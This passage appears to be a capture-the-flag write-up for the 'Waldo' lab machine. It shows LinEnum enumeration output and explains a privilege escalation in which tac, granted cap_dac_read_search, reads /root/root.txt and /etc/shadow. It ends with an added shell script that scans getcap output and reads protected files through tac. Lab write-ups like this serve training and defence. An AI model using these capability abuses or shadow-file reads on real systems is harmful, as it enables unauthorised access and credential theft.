-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 May 29  2017 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron
# See anacron(8) and anacrontab(5) for details.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
# These replace cron's entries
1	5	cron.daily	run-parts --report /etc/cron.daily
7	10	cron.weekly	run-parts --report /etc/cron.weekly
@monthly	15	cron.monthly	run-parts --report /etc/cron.monthly

[-] When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 May  3 16:44 .
drwxr-xr-x 5 root root 4096 May  1 23:25 ..
-rw------- 1 root root    9 Sep 13 04:09 cron.daily
-rw------- 1 root root    9 Sep 13 04:19 cron.monthly
-rw------- 1 root root    9 Sep 13 04:14 cron.weekly

### NETWORKING  ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:a4:80:14 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.87/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:a6:3e:f0:61 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

[-] ARP history:
10.10.10.2 dev ens33 lladdr 00:50:56:a4:99:88 REACHABLE

[-] Nameserver(s):
nameserver 10.10.10.2

[-] Nameserver(s):
Global
         DNS Servers: 10.10.10.2
          DNS Domain: localdomain
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test
Link 3 (docker0)
      Current Scopes: none
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no
Link 2 (ens33)
      Current Scopes: LLMNR/IPv4
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no

[-] Default route:
default via 10.10.10.2 dev ens33 onlink 

[-] Listening TCP:
State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port                
ESTAB      0      0      127.0.0.1:35820                127.0.1.1:ssh                  
ESTAB      0      0      127.0.1.1:ssh                  127.0.0.1:35820                
ESTAB      0      10834  10.10.10.87:8888                 10.10.14.19:58820                

### SERVICES #############################################
[-] Running processes:
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.6  56908  6736 ?        Ss   04:04   0:01 /sbin/init
root          2  0.0  0.0      0     0 ?        S    04:04   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    04:04   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   04:04   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    04:04   0:00 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    04:04   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    04:04   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S<   04:04   0:00 [lru-add-drain]
root         11  0.0  0.0      0     0 ?        S    04:04   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    04:04   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    04:04   0:00 [kdevtmpfs]
root         14  0.0  0.0      0     0 ?        S<   04:04   0:00 [netns]
root         15  0.0  0.0      0     0 ?        S    04:04   0:00 [khungtaskd]
root         16  0.0  0.0      0     0 ?        S    04:04   0:00 [oom_reaper]
root         17  0.0  0.0      0     0 ?        S<   04:04   0:00 [writeback]
root         18  0.0  0.0      0     0 ?        S    04:04   0:00 [kcompactd0]
root         19  0.0  0.0      0     0 ?        SN   04:04   0:00 [ksmd]
root         21  0.0  0.0      0     0 ?        SN   04:04   0:00 [khugepaged]
root         22  0.0  0.0      0     0 ?        S<   04:04   0:00 [crypto]
root         23  0.0  0.0      0     0 ?        S<   04:04   0:00 [kintegrityd]
root         24  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root         25  0.0  0.0      0     0 ?        S<   04:04   0:00 [kblockd]
root         26  0.0  0.0      0     0 ?        S<   04:04   0:00 [devfreq_wq]
root         27  0.0  0.0      0     0 ?        S<   04:04   0:00 [watchdogd]
root         28  0.0  0.0      0     0 ?        S    04:04   0:00 [kswapd0]
root         29  0.0  0.0      0     0 ?        S<   04:04   0:00 [vmstat]
root         41  0.0  0.0      0     0 ?        S<   04:04   0:00 [kthrotld]
root         42  0.0  0.0      0     0 ?        S<   04:04   0:00 [ipv6_addrconf]
root         75  0.0  0.0      0     0 ?        S<   04:04   0:00 [ata_sff]
root         76  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_0]
root         77  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_1]
root         78  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_0]
root         79  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_1]
root         80  0.0  0.0      0     0 ?        S<   04:04   0:00 [vmw_pvscsi_wq_0]
root         81  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_2]
root         82  0.0  0.0      0     0 ?        S    04:04   0:00 [kworker/u256:1]
root         83  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_2]
root         84  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root        128  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root        132  0.0  0.0      0     0 ?        S<   04:04   0:00 [kworker/0:1H]
root        164  0.0  0.0      0     0 ?        S    04:04   0:00 [jbd2/sda1-8]
root        165  0.0  0.0      0     0 ?        S<   04:04   0:00 [ext4-rsv-conver]
root        191  0.0  1.0 133772 10444 ?        Ss   04:04   0:13 /usr/bin/vmtoolsd
root        192  0.0  0.0      0     0 ?        S    04:04   0:00 [kauditd]
root        196  0.0  0.4  56800  4836 ?        Ss   04:04   0:00 /lib/systemd/systemd-journald
root        221  0.0  0.3  45256  3440 ?        Ss   04:04   0:00 /lib/systemd/systemd-udevd
root        279  0.0  0.0      0     0 ?        S<   04:04   0:00 [ttm_swap]
root        310  0.0  0.0      0     0 ?        S<   04:04   0:00 [edac-poller]
systemd+    348  0.0  0.4 127284  4200 ?        Ssl  04:04   0:01 /lib/systemd/systemd-timesyncd
root        366  0.0  0.3 250116  3260 ?        Ssl  04:04   0:00 /usr/sbin/rsyslogd -n
root        367  0.0  1.8 153488 18452 ?        Ss   04:04   0:00 /usr/bin/VGAuthService
root        368  0.0  0.2  29664  2848 ?        Ss   04:04   0:00 /usr/sbin/cron -f
message+    370  0.0  0.3  45116  3676 ?        Ss   04:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        384  0.0  0.4  46524  4800 ?        Ss   04:04   0:00 /lib/systemd/systemd-logind
root        509  0.1  6.4 452516 64620 ?        Ssl  04:04   0:20 /usr/bin/dockerd -H fd://
root        512  0.0  0.1  14536  1660 tty1     Ss+  04:04   0:00 /sbin/agetty --noclear tty1 linux
root        513  0.0  0.6  69944  6208 ?        Ss   04:04   0:00 /usr/sbin/sshd -D
root        607  0.1  2.2 235016 22424 ?        Ssl  04:05   0:20 docker-containerd --config /var/run/docker/containerd/containerd.toml
root        734  0.0  0.4   7648  4388 ?        Sl   04:05   0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/16c6cae0786900838a54b9b3ce253ddd80c3ccdcea93e6c5444e2a8a5a1eaebd -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
root        747  0.0  1.6  85124 16824 pts/0    Ss+  04:05   0:04 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        777  0.0  0.3  12784  3432 pts/0    S    04:05   0:00 nginx: master process nginx -g daemon off;
root        778  0.0  0.2   7320  2664 pts/0    S    04:05   0:00 /usr/sbin/sshd -D -e
root        779  0.0  1.7 133368 17404 pts/0    S    04:05   0:01 php-fpm: master process (/etc/php7/php-fpm.conf)
systemd+    780  0.0  0.1  13264  1680 pts/0    S    04:05   0:00 nginx: worker process
root        782  0.0  0.2   7352  2716 ?        Ss   04:06   0:00 sshd: nobody [priv]
nobody      784  0.0  0.3   9112  3748 ?        S    04:06   0:02 sshd: nobody@pts/1
nobody      785  0.0  0.1   1544  1028 ?        Ss   04:06   0:00 -sh
root       1288  0.0  0.0      0     0 ?        S    06:08   0:08 [kworker/0:1]
nobody     1364  0.0  0.3   8460  3716 ?        S+   06:27   0:01 ssh monitor@waldo -i .monitor
root       1365  0.0  0.7 101380  7180 ?        Ss   06:27   0:00 sshd: monitor [priv]
monitor    1367  0.0  0.6  64872  6088 ?        Ss   06:27   0:00 /lib/systemd/systemd --user
monitor    1368  0.0  0.1  84492  1564 ?        S    06:27   0:00 (sd-pam)
monitor    1374  0.0  0.4 101380  4700 ?        S    06:27   0:00 sshd: monitor@pts/0
monitor    1375  0.0  0.4  21176  4908 pts/0    Ss   06:27   0:00 -rbash
monitor    1442  0.0  0.0   5856   692 pts/0    S    06:50   0:00 red -p red:
monitor    1487  0.0  0.0   4288   796 pts/0    S    07:27   0:00 sh -c /bin/bash
monitor    1488  0.0  0.5  21216  5096 pts/0    S    07:27   0:00 /bin/bash
systemd+   1741  0.0  0.4  49620  4052 ?        Ss   07:50   0:00 /lib/systemd/systemd-resolved
root       1754  0.0  0.0      0     0 ?        S    07:50   0:00 [kworker/u256:0]
root       2381  0.0  0.0      0     0 ?        S    09:28   0:00 [kworker/0:2]
root       2382  0.0  0.0      0     0 ?        S    09:33   0:00 [kworker/0:0]
monitor    2391  0.0  0.3  12140  3888 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2392  0.0  0.3  12176  3372 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2393  0.0  0.0   5844   688 pts/0    S+   09:38   0:00 tee -a
monitor    2564  0.0  0.2  12176  2924 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2565  0.0  0.3  38304  3168 pts/0    R+   09:38   0:00 ps aux

[-] Process binaries and associated permissions (from above list):
776K -rwxr-xr-x 1 root root 773K Mar  1  2018 /usr/sbin/sshd
640K -rwxr-xr-x 1 root root 637K Jan 18  2017 /usr/sbin/rsyslogd
 48K -rwxr-xr-x 1 root root  48K Oct  7  2017 /usr/sbin/cron
 48K -rwxr-xr-x 1 root root  48K Jul 25  2017 /usr/bin/vmtoolsd
152K -rwxr-xr-x 1 root root 149K Jul 25  2017 /usr/bin/VGAuthService
   0 lrwxrwxrwx 1 root root    9 Jan 24  2017 /usr/bin/python2 -> python2.7
 79M -rwxr-xr-x 1 root root  79M Apr 10 14:20 /usr/bin/dockerd
220K -rwxr-xr-x 1 root root 219K Mar  2  2018 /usr/bin/dbus-daemon
   0 lrwxrwxrwx 1 root root   20 Mar 23 08:55 /sbin/init -> /lib/systemd/systemd
 60K -rwxr-xr-x 1 root root  57K Mar  7  2018 /sbin/agetty
456K -rwxr-xr-x 1 root root 455K Mar 23 08:55 /lib/systemd/systemd-udevd
 40K -rwxr-xr-x 1 root root  39K Mar 23 08:55 /lib/systemd/systemd-timesyncd
316K -rwxr-xr-x 1 root root 315K Mar 23 08:55 /lib/systemd/systemd-resolved
204K -rwxr-xr-x 1 root root 203K Mar 23 08:55 /lib/systemd/systemd-logind
120K -rwxr-xr-x 1 root root 119K Mar 23 08:55 /lib/systemd/systemd-journald
1.1M -rwxr-xr-x 1 root root 1.1M Mar 23 08:55 /lib/systemd/systemd
1.1M -rwxr-xr-x 1 root root 1.1M May 15  2017 /bin/bash

[-] /etc/init.d/ binary permissions:
total 88
drwxr-xr-x  2 root root 4096 Jul 15 09:48 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root 2014 May 29  2017 anacron
-rwxr-xr-x  1 root root 2948 Sep 13  2017 bluetooth
-rwxr-xr-x  1 root root 1232 Apr  6  2017 console-setup.sh
-rwxr-xr-x  1 root root 3049 Oct  7  2017 cron
-rwxr-xr-x  1 root root 2813 Mar  2  2018 dbus
-rwxr-xr-x  1 root root 3843 Apr 10 14:09 docker
-rwxr-xr-x  1 root root 3809 Mar 22  2017 hwclock.sh
-rwxr-xr-x  1 root root 1479 May 18  2016 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Dec 25  2016 kmod
-rwxr-xr-x  1 root root 1364 Mar 17  2017 netfilter-persistent
-rwxr-xr-x  1 root root 4597 Sep 16  2016 networking
-rwxr-xr-x  1 root root 1846 Jul 25  2017 open-vm-tools
-rwxr-xr-x  1 root root 1191 Nov 22  2016 procps
-rwxr-xr-x  1 root root 4355 Dec 10  2017 rsync
-rwxr-xr-x  1 root root 2868 Jan 18  2017 rsyslog
-rwxr-xr-x  1 root root 4033 Mar  1  2018 ssh
-rwxr-xr-x  1 root root 6087 Dec  3  2017 udev

### SOFTWARE #############################################
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1627 May  3 16:50 /etc/passwd
-rw-r--r-- 1 root root 773 May  3 16:50 /etc/group
-rw-r--r-- 1 root root 869 May  3 16:50 /etc/profile
-rw-r----- 1 root shadow 1218 May  3 16:50 /etc/shadow

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2792 Jul 24 05:50 /etc/sysctl.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 7431 May  1 23:26 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 346 Nov 30  2016 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 3173 Mar  2  2018 /etc/reportbug.conf
-rw-r--r-- 1 root root 60 Jul 23 10:14 /etc/resolv.conf
-rw-r--r-- 1 root root 1963 Jan 18  2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 497 Dec 31  2017 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2969 May 21  2017 /etc/debconf.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 4781 Jan 24  2017 /etc/hdparm.conf
-rw-r--r-- 1 root root 191 Apr 12  2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 2981 May  1 23:03 /etc/adduser.conf
-rw-r--r-- 1 root root 2584 Aug  1  2016 /etc/gai.conf
-rw-r--r-- 1 root root 599 May  5  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 May  1 23:30 /etc/kernel-img.conf
-rw-r--r-- 1 root root 552 May 27  2017 /etc/pam.conf
-rw-r--r-- 1 root root 973 Jan 31  2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 604 Jun 26  2016 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Apr  9  2017 /etc/ld.so.conf

[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Jul 24 07:58 /home/monitor/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/monitor/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 May  1 23:03 .
drwxr-xr-x 11 root root 4096 May  1 23:03 ..

[+] Looks like we're hosting Docker:
Docker version 18.04.0-ce, build 3d479c0

### SCAN COMPLETE ####################################
monitor@waldo:/tmp$ 

Privilege Escalation

Privesc on this machine took ages. I got stuck down various rabbit holes for hours, days even. I'm not going to lie, I don't think that without some HTB forum hints I would have got much further in any reasonable amount of time.

The app-dev folder contains code and executables for a log monitoring application and, since the passwd file says the monitor user is "for editing source and monitoring logs", I assumed that the box-writer intended us to edit some source code. The logMonitor binary in the app-dev folder doesn't do what it's supposed to do: feeding it options like -a doesn't read the log that the source code indicates it should, and only the -h help option works. However, there is a subfolder with a 0.1 version which DOES work. The weird thing is that this file is not owned by root and does not have SUID set, which leaves you wondering how it is able to read log files that the other binary cannot, even though both are run by the same user. So the question becomes "what is the difference between this and the non-working version?":

The answer turns out to be Capabilities, a kernel feature that splits the monolithic superuser privilege into distinct units (reading any file, binding low ports, and so on) which can be attached to individual executables, see: https://man7.org/linux/man-pages/man7/capabilities.7.html. Running the getcap command on both binaries shows what the updated logMonitor binary has been granted that the other one hasn't. Maybe there is a clever way of using this that involves editing the source code to give you various powers, overwriting logMonitor-0.1 and abusing it; there is also a Python file that appears to check a file and do something with its hash, which hints at replacing that file, but I couldn't work it out if there is. But running getcap -r / 2>/dev/null lists the capability sets of every file we can access, and it turns up a command called tac (which is cat in reverse: it prints a file's lines in reverse order). tac has been given the capability that lets a process read any file regardless of its permission bits (in capability terms CAP_DAC_READ_SEARCH, which bypasses file read and directory search permission checks), so it can read /root/root.txt and we've got our flag.

We can also read the shadow file this way, and I ran JTR over the hashes found there but didn't get a hit with the wordlists I used.
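
The getcap sweep described above, as an added example that is not part of the original walkthrough: a small POSIX shell script that triages getcap output for capabilities which let a low-privileged user read or change files as root would, and then reads a file through a capable tac (piping through tac twice restores the original line order). The list of capabilities it flags is this example's own choice, and the sample getcap lines in the usage note are constructed to match getcap's two output formats, not copied from the box.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: triage the output of
# "getcap -r / 2>/dev/null" for capabilities that let an unprivileged user read
# or modify files as if they were root, then read a file through a capable
# binary such as tac. The DANGEROUS list is this example's own choice.

# Capabilities worth a closer look when found on a binary a low-privileged
# user can execute. cap_dac_read_search is the one that lets tac read
# /root/root.txt on this box; the others are common privesc primitives.
DANGEROUS='cap_dac_read_search cap_dac_override cap_setuid cap_setgid
cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module'

# triage_caps: read getcap output on stdin and print "path<TAB>capability"
# for every dangerous capability found. Handles both getcap output formats:
#   /usr/bin/tac = cap_dac_read_search+ei     (libcap before 2.41)
#   /usr/bin/tac cap_dac_read_search=ei       (libcap 2.41 and later)
triage_caps() {
    while read -r path rest; do
        [ -n "$path" ] || continue
        capset=${rest##* }          # last token is the capability set
        caps=${capset%%[+=]*}       # strip the "+ei" / "=ei" flag suffix
        for cap in $(printf '%s' "$caps" | tr ',' ' '); do
            for bad in $DANGEROUS; do
                if [ "$cap" = "$bad" ]; then
                    printf '%s\t%s\n' "$path" "$cap"
                fi
            done
        done
    done
    return 0   # the loop's status is just the last comparison; not an error
}

# read_via_tac: use a tac that carries cap_dac_read_search to read a file we
# otherwise cannot, piping through tac a second time to restore line order.
# Only the first tac needs the capability; the second just reverses stdin.
read_via_tac() {
    tac "$1" | tac
}

# Usage on the target. The scan only runs when invoked with --scan, so the
# functions above can be sourced and tested on their own:
#   sh caps.sh --scan
#   read_via_tac /root/root.txt
if [ "${1:-}" = "--scan" ]; then
    getcap -r / 2>/dev/null | triage_caps
fi
```

Given constructed lines such as `/usr/bin/tac = cap_dac_read_search+ei`, `/usr/bin/ping = cap_net_raw+ep` and `/usr/bin/newuidmap cap_setuid=ep`, triage_caps reports tac and newuidmap and stays silent on ping, since cap_net_raw does not help with reading files. The flag suffix matters when you move from reading to exploiting: +ei (effective and inheritable) means the capability is active whenever the binary runs, whereas an inheritable-only set would need a matching ambient or inheritable capability in the calling process.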

Filed Under: Penetration Testing
